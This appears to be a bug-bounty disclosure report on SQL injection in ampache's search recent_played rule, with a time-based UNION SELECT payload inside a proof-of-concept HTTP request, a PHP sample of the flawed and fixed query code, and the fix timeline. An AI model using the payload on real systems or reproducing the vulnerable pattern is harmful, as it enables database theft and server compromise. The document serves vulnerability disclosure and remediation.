SQL Injection in search function in ampache/ampache

Valid

Reported on

Jan 17th 2023


Description

In the search function

With the recent_played rule option, the user-supplied rule input is taken directly into the SQL query instead of being passed as a bound parameter of the prepared statement.
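The pattern the report describes, shown as an added example that is not ampache's code: a hypothetical recent_played rule builder that interpolates the rule input into the SQL, beside a hardened version that enforces the integer type on the server (the maintainer's later note is that only the interface checks for ints) and binds the value. The table name play_history, the column names and the $pdo connection are assumptions for illustration.

```php
<?php
// Added example, not ampache's code. Table and column names are illustrative.

// VULNERABLE: the raw rule input is spliced into the SQL text. The web form
// only offers an integer field, but a hand-crafted POST can send any string,
// so the subquery can be closed and further SQL appended.
function buildRecentPlayedJoinVulnerable(string $ruleInput): string
{
    return "LEFT JOIN (SELECT `object_id` FROM `play_history` "
         . "ORDER BY `date` DESC LIMIT {$ruleInput}) AS `recent` "
         . "ON `song`.`id` = `recent`.`object_id`";
}

// HARDENED: validate server-side that the value is a non-negative integer
// and bind it as a typed parameter. A client-side check is not a control;
// the server must enforce the type itself.
function buildRecentPlayedJoinSafe(string $ruleInput): array
{
    $limit = filter_var($ruleInput, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0],
    ]);
    if ($limit === false) {
        throw new InvalidArgumentException('recent_played expects a non-negative integer');
    }
    $sql = "LEFT JOIN (SELECT `object_id` FROM `play_history` "
         . "ORDER BY `date` DESC LIMIT :limit) AS `recent` "
         . "ON `song`.`id` = `recent`.`object_id`";
    return [$sql, [':limit' => [$limit, PDO::PARAM_INT]]];
}

// Usage with a PDO connection ($pdo is assumed). Native prepares are needed
// for a bound LIMIT value on MySQL; with emulation the value would be quoted.
function runSafeSearch(PDO $pdo, string $ruleInput): array
{
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    [$join, $params] = buildRecentPlayedJoinSafe($ruleInput);
    $stmt = $pdo->prepare("SELECT `song`.`id` FROM `song` {$join}");
    foreach ($params as $name => [$value, $type]) {
        $stmt->bindValue($name, $value, $type);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}
```

The rejected-input path is the important one: anything that is not a plain integer never reaches the query text at all.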


Proof of Concept

POST /ampache-5.5.6_all_php7.4/public/search.php?type=song HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 182
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/ampache-5.5.6_all_php7.4/public/
Cookie: ampache_user=guest; ampache_lang=en_US; Phpstorm-17c87dff=9619a576-ef80-49a0-9252-c4b775fa56e9; PHPSESSID=5t42n9a1kgatekd8php652hmmb; ampache=7bpnb4re3e8q400l5lkk2v05qm; sidebar_state=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

limit=0&operator=AND&rule_1=recent_played&rule_1_operator=0&rule_1_input=1337)+as+`vcl`+ON+`song`.`id`!=`vcl`.`object_id`+UNION+SELECT+sleep(5),133337--+%23&action=search&browse_id=0

(screenshot: poc)

Impact

The vulnerability allows authenticated users to perform SQL injection. A successful attack may result in the selection of entire tables and, in certain cases, the attacker gaining administrative rights to the database, writing files to the server leading to Remote Code Execution, stored XSS, or writing a script to extract data.

We are processing your report and will contact the ampache team within 24 hours. 2 months ago
We have contacted a member of the ampache team and are waiting to hear back 2 months ago
ampache/ampache maintainer has acknowledged this report 2 months ago
lachlan validated this vulnerability 2 months ago

the interface checks for ints but that doesn't stop the link itself

d47sec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
lachlan marked this as fixed in 5.5.7,develop with commit c456e6 2 months ago
lachlan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 10th 2023
lachlan published this vulnerability a month ago